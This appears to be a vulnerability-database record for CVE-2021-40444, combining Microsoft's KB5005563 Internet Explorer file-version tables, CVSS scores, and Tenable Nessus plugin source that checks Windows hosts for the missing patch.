\njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 32,768 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 33,280 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 35,328 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 37,888 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 34,304 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 33,280 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 34,304 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 27,648 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 34,304 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 33,792 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 23,040 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 22,016 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 31,232 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 34,304 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 35,840 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 32,768 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 33,280 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 34,816 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 33,280 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 32,256 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 32,768 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 30,720 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 16,384 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 16,896 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 16,896 \n \n### **Windows Server 2008**\n\n### \n\n__\n\nInternet Explorer 9 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nurlmon.dll| 9.0.8112.21591| 9-Sep-2021| 2:06| 1,142,784 \niexplore.exe| 9.0.8112.21591| 9-Sep-2021| 2:17| 751,512 \ninetcpl.cpl| 9.0.8112.21591| 9-Sep-2021| 2:05| 1,427,968 \nwininet.dll| 9.0.8112.21591| 9-Sep-2021| 2:06| 1,132,544 \njsproxy.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 75,776 \nWininetPlugin.dll| 1.0.0.1| 9-Sep-2021| 2:05| 66,048 \ntdc.ocx| 9.0.8112.21591| 9-Sep-2021| 2:05| 63,488 \niedvtool.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 678,912 \ndxtmsft.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 354,304 \ndxtrans.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 223,744 \nmsfeeds.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 607,744 \nmsfeeds.mof| Not versioned| 9-Sep-2021| 1:40| 1,518 \nmsfeedsbs.mof| Not versioned| 9-Sep-2021| 1:40| 1,574 \nmsfeedsbs.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 41,472 \nmsfeedssync.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 10,752 \nmshta.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 11,776 \nhtml.iec| 2019.0.0.21586| 9-Sep-2021| 2:08| 367,616 \nmshtmled.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 72,704 \nmshtml.dll| 9.0.8112.21591| 9-Sep-2021| 2:10| 12,845,056 \nmshtml.tlb| 9.0.8112.21591| 9-Sep-2021| 2:05| 2,382,848 \nielowutil.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 223,232 \nieproxy.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 195,072 \nIEShims.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 194,560 \nExtExport.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 22,528 \nWindows Pop-up Blocked.wav| Not versioned| 11-Mar-2021| 0:00| 85,548 \nWindows Information Bar.wav| Not versioned| 11-Mar-2021| 0:00| 23,308 \nWindows Feed Discovered.wav| Not versioned| 11-Mar-2021| 0:00| 19,884 \nWindows Navigation Start.wav| Not versioned| 11-Mar-2021| 0:00| 11,340 \nieUnatt.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 142,848 \njsdbgui.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 387,584 \niertutil.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 1,808,384 \nsqmapi.dll| 6.0.6000.16386| 9-Sep-2021| 2:17| 142,744 \nVGX.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 769,024 \nurl.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 231,936 \nieframe.dll| 9.0.8112.21591| 9-Sep-2021| 2:07| 9,757,696 \nieui.dll| 9.0.8112.21591| 9-Sep-2021| 2:03| 176,640 \nieinstal.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 474,624 \nInetRes.adml| Not versioned| 9-Sep-2021| 2:23| 393,813 \ninetres.admx| Not versioned| 11-Mar-2021| 0:10| 1,601,204 \njsdebuggeride.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 104,448 \njscript.dll| 5.8.7601.21586| 9-Sep-2021| 2:05| 723,456 \njscript9.dll| 9.0.8112.21591| 9-Sep-2021| 2:11| 1,819,648 \nvbscript.dll| 5.8.7601.21586| 9-Sep-2021| 2:05| 434,176 \n \n### \n\n__\n\nInternet Explorer 9 on all supported x64-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nurlmon.dll| 9.0.8112.21591| 9-Sep-2021| 3:16| 1,391,616 \niexplore.exe| 9.0.8112.21591| 9-Sep-2021| 3:31| 757,656 \ninetcpl.cpl| 9.0.8112.21591| 9-Sep-2021| 3:15| 1,494,528 \nwininet.dll| 9.0.8112.21591| 9-Sep-2021| 3:16| 1,395,200 \njsproxy.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 97,280 \nWininetPlugin.dll| 1.0.0.1| 9-Sep-2021| 3:15| 86,528 \ntdc.ocx| 9.0.8112.21591| 9-Sep-2021| 3:14| 76,800 \niedvtool.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 887,808 \ndxtmsft.dll| 9.0.8112.21591| 9-Sep-2021| 3:14| 452,608 \ndxtrans.dll| 9.0.8112.21591| 9-Sep-2021| 3:14| 281,600 \nmsfeeds.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 729,088 \nmsfeeds.mof| Not versioned| 9-Sep-2021| 2:48| 1,518 \nmsfeedsbs.mof| Not versioned| 9-Sep-2021| 2:48| 1,574 \nmsfeedsbs.dll| 9.0.8112.21591| 9-Sep-2021| 3:14| 55,296 \nmsfeedssync.exe| 9.0.8112.21591| 9-Sep-2021| 3:14| 11,264 \nmshta.exe| 9.0.8112.21591| 9-Sep-2021| 3:14| 12,800 \nhtml.iec| 2019.0.0.21586| 9-Sep-2021| 3:19| 448,512 \nmshtmled.dll| 9.0.8112.21591| 9-Sep-2021| 3:14| 96,256 \nmshtml.dll| 9.0.8112.21591| 9-Sep-2021| 3:24| 18,812,416 \nmshtml.tlb| 9.0.8112.21591| 9-Sep-2021| 3:14| 2,382,848 \nielowutil.exe| 9.0.8112.21591| 9-Sep-2021| 3:15| 223,744 \nieproxy.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 550,912 \nIEShims.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 305,664 \nWindows Pop-up Blocked.wav| Not versioned| 11-Mar-2021| 0:00| 85,548 \nWindows Information Bar.wav| Not versioned| 11-Mar-2021| 0:00| 23,308 \nWindows Feed Discovered.wav| Not versioned| 11-Mar-2021| 0:00| 19,884 \nWindows Navigation Start.wav| Not versioned| 11-Mar-2021| 0:00| 11,340 \nieUnatt.exe| 9.0.8112.21591| 9-Sep-2021| 3:15| 173,056 \njsdbgui.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 499,200 \niertutil.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 2,163,200 \nsqmapi.dll| 6.0.6000.16386| 9-Sep-2021| 3:31| 176,024 \nVGX.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 997,376 \nurl.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 237,056 \nieframe.dll| 9.0.8112.21591| 9-Sep-2021| 3:17| 10,944,000 \nieui.dll| 9.0.8112.21591| 9-Sep-2021| 3:12| 248,320 \nieinstal.exe| 9.0.8112.21591| 9-Sep-2021| 3:15| 490,496 \nInetRes.adml| Not versioned| 9-Sep-2021| 3:37| 393,813 \ninetres.admx| Not versioned| 11-Mar-2021| 0:10| 1,601,204 \njsdebuggeride.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 141,312 \njscript.dll| 5.8.7601.21586| 9-Sep-2021| 3:15| 818,176 \njscript9.dll| 9.0.8112.21591| 9-Sep-2021| 3:21| 2,358,784 \nvbscript.dll| 5.8.7601.21586| 9-Sep-2021| 3:15| 583,680 \niexplore.exe| 9.0.8112.21591| 9-Sep-2021| 2:17| 751,512 \nieUnatt.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 142,848 \nurlmon.dll| 9.0.8112.21591| 9-Sep-2021| 2:06| 1,142,784 \ninetcpl.cpl| 9.0.8112.21591| 9-Sep-2021| 2:05| 1,427,968 \nwininet.dll| 9.0.8112.21591| 9-Sep-2021| 2:06| 1,132,544 \njsproxy.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 75,776 \nWininetPlugin.dll| 1.0.0.1| 9-Sep-2021| 2:05| 66,048 \ntdc.ocx| 9.0.8112.21591| 9-Sep-2021| 2:05| 63,488 \niedvtool.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 678,912 \ndxtmsft.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 354,304 \ndxtrans.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 223,744 \nmsfeeds.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 607,744 \nmsfeeds.mof| Not versioned| 9-Sep-2021| 1:40| 1,518 \nmsfeedsbs.mof| Not versioned| 9-Sep-2021| 1:40| 1,574 \nmsfeedsbs.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 41,472 \nmsfeedssync.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 10,752 \nmshta.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 11,776 \nhtml.iec| 2019.0.0.21586| 9-Sep-2021| 2:08| 367,616 \nmshtmled.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 72,704 \nmshtml.dll| 9.0.8112.21591| 9-Sep-2021| 2:10| 12,845,056 \nmshtml.tlb| 9.0.8112.21591| 9-Sep-2021| 2:05| 2,382,848 \nielowutil.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 223,232 \nieproxy.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 195,072 \nIEShims.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 194,560 \nExtExport.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 22,528 \njsdbgui.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 387,584 \niertutil.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 1,808,384 \nsqmapi.dll| 6.0.6000.16386| 9-Sep-2021| 2:17| 142,744 \nVGX.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 769,024 \nurl.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 231,936 \nieframe.dll| 9.0.8112.21591| 9-Sep-2021| 2:07| 9,757,696 \nieui.dll| 9.0.8112.21591| 9-Sep-2021| 2:03| 176,640 \nieinstal.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 474,624 \njsdebuggeride.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 104,448 \njscript.dll| 5.8.7601.21586| 9-Sep-2021| 2:05| 723,456 \njscript9.dll| 9.0.8112.21591| 9-Sep-2021| 2:11| 1,819,648 \nvbscript.dll| 5.8.7601.21586| 9-Sep-2021| 2:05| 434,176 \n \n## **Information about protection and security**\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n\n## **References**\n\nLearn about the [terminology](<https://support.microsoft.com/help/824684>) that Microsoft uses to describe software updates.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-07T07:00:00", "type": "mskb", "title": "KB5005563: Cumulative security update for Internet Explorer: September 14, 2021", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-07T07:00:00", "id": "KB5005563", "href": "https://support.microsoft.com/en-us/help/5005563", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-11T14:55:54", "description": "The Internet Explorer installation on the remote host is missing a security update. It is, therefore, affected by a memory corruption error in the scripting engine. An unauthenticated, remote attacker can exploit this to execute arbitrary commands. (CVE-2021-40444)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "Security Updates for Internet Explorer (September 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-08-22T00:00:00", "cpe": ["cpe:/a:microsoft:ie"], "id": "SMB_NT_MS21_SEP_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/153374", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153374);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/22\");\n\n script_cve_id(\"CVE-2021-40444\");\n script_xref(name:\"MSKB\", value:\"5005563\");\n script_xref(name:\"MSKB\", value:\"5005606\");\n script_xref(name:\"MSKB\", value:\"5005613\");\n script_xref(name:\"MSKB\", value:\"5005623\");\n script_xref(name:\"MSKB\", value:\"5005633\");\n script_xref(name:\"MSFT\", value:\"MS21-5005563\");\n script_xref(name:\"MSFT\", value:\"MS21-5005606\");\n script_xref(name:\"MSFT\", value:\"MS21-5005613\");\n script_xref(name:\"MSFT\", value:\"MS21-5005623\");\n script_xref(name:\"MSFT\", value:\"MS21-5005633\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Security Updates for Internet Explorer (September 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is missing a security update. It is, therefore, affected by a\nmemory corruption error in the scripting engine. An unauthenticated, remote attacker can exploit this to execute\narbitrary commands. (CVE-2021-40444)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005563\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005606\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005613\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005623\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005633\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB5005563\n -KB5005606\n -KB5005613\n -KB5005623\n -KB5005633\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-40444\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = 'MS21-09';\nvar kbs = make_list(\n '5005563',\n '5005606',\n '5005613',\n '5005623',\n '5005633'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nvar os = get_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar productname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif ('Windows 8' >< productname && '8.1' >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif ('Vista' >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:'6.3', sp:0, file:'mshtml.dll', version:'11.0.9600.20120', min_version:'11.0.9600.16000', dir:'\\\\system32', bulletin:bulletin, kb:'5005563') ||\n\n # Windows Server 2012\n # Internet Explorer 11\n hotfix_is_vulnerable(os:'6.2', sp:0, file:'mshtml.dll', version:'11.0.9600.20120', min_version:'11.0.9600.16000', dir:'\\\\system32', bulletin:bulletin, kb:'5005563') ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:'6.1', sp:1, file:'mshtml.dll', version:'11.0.9600.20120', min_version:'11.0.9600.16000', dir:'\\\\system32', bulletin:bulletin, kb:'5005563') ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:'6.0', sp:2, file:'mshtml.dll', version:'9.0.8112.21591', min_version:'9.0.8112.16000', dir:'\\\\system32', bulletin:bulletin, kb:'5005563')\n)\n{\n var report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB5005563 : Cumulative Security Update for Internet Explorer\\n';\n\n if(os == '6.3')\n {\n report += ' - KB5005613 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5005613', report);\n }\n else if(os == '6.2')\n {\n report += ' - KB5005623 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5005623', report);\n }\n else if(os == '6.1')\n {\n report += ' - KB5005633 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5005633', report);\n }\n else if(os == '6.0')\n {\n report += ' - KB5005606 : Windows Server 2008 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5005606', report);\n }\n\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n\n var port = kb_smb_transport();\n\n hotfix_security_warning();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:54:45", "description": "This plugin is a work-around and is being deprecated due other superceded Microsoft Security patches. See Nessus Plugin IDs: 153374, 153372, 153373, 153375, 153377, 153381, 153383", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft Internet Explorer OOB (Sept 2021) (deprecated)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-05T00:00:00", "cpe": ["cpe:2.3:a:microsoft:ie:*:*:*:*:*:*:*:*"], "id": "SMB_NT_MS21_IE_SEPT_2021.NASL", "href": "https://www.tenable.com/plugins/nessus/153214", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2021/09/23. Deprecated due to patch tuesday patches.\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153214);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/07/05\");\n\n script_cve_id(\"CVE-2021-40444\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Security Updates for Microsoft Internet Explorer OOB (Sept 2021) (deprecated)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"This plugin is a work-around and is being deprecated due other superceded Microsoft Security patches. See Nessus \nPlugin IDs: 153374, 153372, 153373, 153375, 153377, 153381, 153383\n \");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444\");\n script_set_attribute(attribute:\"solution\", value:\n\"n/a\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:C/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-40444\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\nexit(0, 'This plugin has been deprecated. Use Nessus Plugin IDs: 153374, 153372, 153373, 153375, 153377, 153381, 153383 ');\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:54:49", "description": "The remote Windows host is missing security update 5005627 or cumulative update 5005613. It is, therefore, affected by multiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958, CVE-2021-40444)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36974, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-38624)\n\n - A session spoofing vulnerability exists. An 